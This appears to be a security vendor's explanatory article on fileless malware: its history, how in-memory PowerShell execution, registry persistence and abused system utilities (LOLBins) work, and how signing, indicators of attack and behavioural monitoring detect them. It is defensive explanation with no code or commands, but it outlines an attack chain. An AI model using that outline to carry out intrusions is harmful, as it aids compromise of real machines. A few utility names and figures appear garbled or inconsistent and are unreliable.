The first appearance of a fileless malware attack is said to date back to 2001. And despite peaks in activity in 2017, 2019 and 2021, these fileless attacks are still largely misunderstood, and raise questions about how they work. But what are the technical characteristics of these attacks? And are cybersecurity tools actually able to detect them?
In April 2020, ENISA published a report explaining that fileless malware attacks are 10 times more likely to succeed than a conventional attack. We take a closer look at fileless virus attacks.
The first appearances of fileless malware
The term made its first appearance in 2001 with the Code Red worm. This worm exploited a buffer overrun vulnerability in Microsoft IIS web servers, and was the first code to be categorised as “fileless malware”. The term of fileless virus can also be used. No fewer than 359,000 servers were affected by a crash on the home page displaying a “Welcome to http://www.worm.com! Hacked by Chinese!” message from a mysterious virus that left no files and no permanent traces on the hard drive. And for good reason: after investigation, the worm was found to have run only in the memory of the infected machine; a first.
For the next two decades, this mechanism was widely used in Microsoft environments. As early as 2003, the SQL Slammer worm used this same modus operandi to compromise Microsoft SQL Server instances, with the aim of launching a denial-of-service attack. In 2013, the Lurk banking trojan exploited a vulnerability in the Java language and downloaded a malicious DLL into memory. In 2014, the modus operandi of the fileless malware attack evolved with the appearance of the Poweliks trojan, which installed itself in a Windows registry key, the value of which contained the malicious script. The malware then obtained a persistent state through a legitimate program used by the Windows operating system. In 2015, the Duqu 2.0 worm was used as a toolbox for cyber-espionage with features such as lateral movement, data exfiltration and recognition of the host and its immediate environment. In 2016, with the PowerSniff malware, the modus operandi evolved further, incorporating the fileless approach into part of the attack. The initial access here is via a classic dropper – a Word file – which does not (at all) match the profile of a fileless attack. But this dropper contains a macro that runs PowerShell in background mode to download a remote file and then run it directly in PowerShell memory. It is therefore this second part of the attack that is considered fileless, in the form of a script and shellcode. But it was mainly in 2017 that the fileless malware gained greater recognition, with the exfiltration of data from 150 million Equifax customers through a vulnerability in the Apache Struts web application framework.
Since it does not use a file that is written to the hard disk, a fileless malware cannot be detected by antivirus software that offers protection based on file fingerprinting mechanisms. The strength of this attack lies in the fact that it targets elements that are not covered by antivirus software.Sébastien Viou, Director of Product Cybersecurity and Cyber-Evangelist at Stormshield
For Sébastien Viou, Director of Product Cybersecurity and Cyber-Evangelist at Stormshield, these innovations are a demonstration of the technological lead that cyber-criminals held over the anti-virus vendors of the time: “Since it does not use a file that is written to the hard disk, a fileless malware cannot be detected by antivirus software that offers protection based on file fingerprinting mechanisms. The strength of this attack lies in the fact that it targets elements that are not covered by antivirus software. The cybercriminals were operating in a space in which the antivirus was simply not looking, leaving a door open on the victims’ machines.”
Fileless malware: shifting definitions and techniques
Memory-only malware, non-malware attack, zero-footprint attack... it goes under many different names, but what is a fileless malware attack? A fileless malware attack is therefore a mechanism with the particular characteristic of running malware without leaving any trace on the disk, as explained by Cyril Cléaud, a malware analyst at Stormshield: “A fileless malware attack is a malicious attack in which remote code is retrieved and executed without using the intermediary of a local file. This may, for example, take the form of text strings retrieved from a web server and then passed as parameters to a script interpreter such as PowerShell. The code will then be executed directly in PowerShell memory. This is an attack that leaves no trace on the disk.” And the techniques used in a fileless virus to execute malicious code in memory can be diverse: hijacking the use of native programs required for the proper functioning of the operating system, injecting malicious code into existing processes, storing malware in Windows registry keys, etc. There are even ready-to-use exploit kits, such as the PowerShell Empire, PowerSploit and Cobalt Strike tools. Using these tools, attackers can take remote control of the victim machine and subsequently attempt to access a persistent state on the machine upon reboot. But more often than not, such fileless malware are based on a known vulnerability, with the aim of gaining privileged access to the operating system. And once there, technical implementation is relatively simple, as Cyril Cléaud points out: “Information on this type of attack is readily available on the Internet. And in most cases, the command lines are very short. For an attacker who knows how to exploit the vulnerability, the first (preparatory) step would be to expose a malicious payload on a web server that they control and is accessible via a URL of their choice. The second step will follow when the vulnerability is exploited, which is simply a question of requesting a script interpreter to download this payload and then execute it.”
How does a fileless malware work? A typical scenario consists of three stages. In the first instance, cyber criminals need to gain initial access, usually through phishing and spear phishing campaigns. Although this initial phase of the attack is executed in memory only, the second step consists of making the access persistent even in the event of a reboot. At this stage, registry keys represent an asset for cybercriminals. Cyril Cléaud points out: “Some registry keys are read in order to run programs when the session is opened. By writing payload download and execution code into these keys as a PowerShell parameter, the cybercriminal has a persistent means of entry to download another viral payload onto the machine. The most convenient aspect for the attacker is that the malware is not stored on the victim’s machine: this means that firstly, there is no file and, secondly, attackers can update their malware in real time. However, even without a file, it leaves a trace: the URL for the payload. The trick is therefore to scramble this URL to prevent it from being detected as an indicator of compromise”. The third and final step depends on the initial aims of the attack: theft of identifiers, data exfiltration or creation of a backdoor.
Another strong trend that is being observed is the hijacking or replacement of a legitimate program. A term that emerged during the 2013 DerbyCon 3 conference, Living Off the Land (LotL, or LOLBins - for “Living Off The Land Binaries”) is a practice that involves spoofing a utility program that is used on operating systems and therefore recognised as legitimate by them. LOLBins frequently found on Windows operating systems include the utilities certutil.exe, mavinject.exe, cmdl.exe, msixec and WMI (Windows Management Interface), as well as the PowerShell and bash interpreters. These various legitimate programs increase the efficiency of the attack tenfold, as some of them include native functions such as downloading files or connecting to a remote machine. The use of LOLBins in a cyber attack can therefore be problematic, as it is very difficult to detect whether they are being used in a legitimate or a malicious way. In some cases, these utilities are even found on security solution whitelists... and so it is common to see the use of LOLBAS (LOL Binaries And Scripts) – third-party scripts executed with the help of LOLBins – and LOLLibs, which are custom-developed libraries that can provide additional functionalities for the hijacked executable.
In 2018, the Grand Crab ransomware-as-a-service platform incorporated the fileless malware into its modus operandi; as a result, over 50,000 machines worldwide were infected. Given such innovative approaches, what can you do to detect an undetectable threat?
Fileless malware: how do you protect yourself against undetectable malware?
When faced with fileless malware, innovative protection techniques are required to complement traditional detection tools. To remedy this situation, new methods of detecting attacks have been developed. The most common one is based on the signature mechanism of Windows executables, as summarised by Sébastien Viou: “By default, Windows signs its executables. This complicates the task of the attacker, who must either replace the file in memory after the signature has been verified; or spoof the file’s destination by making the operating system believe that the file that has been replaced is the original file; or modify the application at its source. This strategy is a fairly simple way to protect against less advanced attacks.”
A second strategy is to improve the use of blacklists. Such blacklists need to go into more detail about what they block and now contain patterns that have been used, such as strings or commands that have been detected as part of a malicious process. These are called Indicators of Attack (IOAs). In addition, an open-source project called LOLBAS (Living Off The Land Binaries and Scripts) was created in 2018 on the Github platform, and now includes more than 4,500 hijacked LOLBins. Aimed at the purple and blue teams of cybersecurity services companies, this project is currently maintained by more than 60 volunteer engineers, and categorises more than 150 binaries that are potentially subject to hijacking. For each utility, indicators are provided.
A third strategy is behavioural surveillance. Used by endpoint protection solutions, it makes it possible to monitor possible actions such as connecting to a command and control server, connecting to an IP with a bad reputation or correlating a sequence of actions, such as using a scripting engine from an untrustworthy command line and then reading and executing files. The detection of inconsistencies in the use of system utilities is also a strong signal, as identified by Cyril Cléaud: “In addition to the signature of the executable, there are behavioural monitoring mechanisms. It is possible to detect if a program is experiencing buffer overrun or code injection, or simply if an administration utility is being used by a user account that does not have the appropriate rights.”
Year after year, cybercriminals demonstrate their ability to implement obfuscation strategies that allow them to fly under the radar of security tools. And the emergence of players specialising in creating initial access, such as initial access brokers, unfortunately suggests that fileless malware attacks will continue to spread in the future. More than ever, companies must adopt methods for detecting indicators of attack, while striving to raise awareness of digital hygiene among all employees.